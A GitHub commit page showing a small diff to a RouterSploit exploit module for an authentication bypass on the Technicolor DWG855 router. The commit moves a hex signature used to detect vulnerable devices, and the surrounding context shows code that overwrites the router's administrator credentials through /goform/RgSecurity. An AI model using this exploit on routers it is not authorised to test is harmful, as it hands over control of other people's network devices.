Update dwg855_authbypass.py

f8b4aa2b · 0BuRner · GitHub · 761cf45f · f8b4aa2b
Commit f8b4aa2b authored Nov 13, 2016 by 0BuRner Committed by GitHub Nov 13, 2016
Hide whitespace changes
Inline Side-by-side

Showing with 3 additions and 3 deletions

dwg855_authbypass.py ...rsploit/modules/exploits/technicolor/dwg855_authbypass.py +3 -3

No files found.
--- a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+++ b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
@@ -35,6 +35,9 @@ class Exploit(exploits.Exploit):
    nuser = exploits.Option('ruser', 'Overwrite old user with.. ')
    npass = exploits.Option('rpass', 'Overwrite old password with.. ')

+    # The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
+    vulnresp = binascii.unhexlify('114475636b7900')  # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
+    
    def run(self):
        print_status("Changing " + self.target + " credentials to " + self.nuser + ":" + self.npass)
        url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
@@ -54,9 +57,6 @@ class Exploit(exploits.Exploit):

    def check(self):

-        # The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
-        vulnresp = binascii.unhexlify('114475636b7900')  # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
-
        url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
        user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
        headers = {'User-Agent': user_agent,